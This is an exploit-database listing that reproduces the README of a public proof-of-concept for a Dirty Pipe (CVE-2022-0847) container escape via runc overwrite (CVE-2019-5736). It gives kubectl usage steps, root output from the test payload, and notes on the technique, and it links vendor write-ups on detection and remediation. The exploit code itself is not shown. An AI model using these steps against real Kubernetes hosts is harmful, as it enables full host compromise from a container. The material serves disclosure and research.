Exploit for Improper Initialization in Linux Linux Kernel CVE-2019-5736 CVE-2022-0847

Name: Exploit for Improper Initialization in Linux Linux Kernel CVE-2019-5736 CVE-2022-0847
Rating: 5 (116 reviews)
2022-03-09 | CVSS 9.3
## https://sploitus.com/exploit?id=1BD47E86-3B10-5D96-B1C1-658AFD757407
# Dirty Pipe Container Escape

**Write-up: [Using the Dirty Pipe Vulnerability to Break Out from Containers](https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/)**

This repository contains a proof of concept exploit leveraging the Dirty Pipe vulnerability (CVE-2022-0847) to break out from an underprivileged container.

Tested on a Kernel 5.10.0-0 with runc 1.0.2 on Kubernetes 1.22.7, but should work on any vulnerable kernel.

See also: [The Dirty Pipe vulnerability: Overview, detection, and remediation](https://www.datadoghq.com/blog/dirty-pipe-vulnerability-overview-and-remediation/).

## Demo

<p align="center">
  <a href="https://github.com/DataDog/dirtypipe-container-breakout-poc/raw/main/demo.gif">
    <img src="./demo.gif" alt="Terminal recording" />
  </a>
</p>


## Usage

1. Deploy the pod definition `pod.yaml` to a Kubernetes cluster. This simulates a pod having been compromised by an attacker. Note that the pod is underprivileged.

```
$ kubectl apply -f pod.yaml
pod/compromised-pod created
```

2. Execute `/bin/sh` in your compromised pod. This will trigger the exploit and overwrite the runc binary on the host, leading to a full host compromise.

```
$ kubectl exec -it compromised-pod -- sh
```

The payload used in the current exploit simply runs `id` and `hostname` and outputs the result to `/tmp/hacked`:

```
$ cat /tmp/hacked
uid=0(root) gid=0(root) groups=0(root)
pool-stbjbwsjv-cn15e
```

## Notes

This proof-of-concept requires the malicious script to run as root, in order to overwrite /bin/sh (or any binary that has a high chance of being executed through kubectl exec) with the necessary contents (`#!/proc/self/exe`). Note that we cannot use Dirty Pipe itself to overwrite a binary with this string, as Dirty Pipe doesn’t allow to overwrite the first byte of the target file. The first byte of a binary executable would remain 0x7f, the first magic byte of an ELF binary.

Breaking out from a container using an underprivileged user is left as an exercise to the reader, who is highly encouraged to contribute back to this repository. :-) 

## Credits

- Dirty Pipe original PoC: Max Kellermann (https://dirtypipe.cm4all.com/)
- Explotation of CVE-2019-5736 through overwrite of runc: Yuval Avrahami (https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)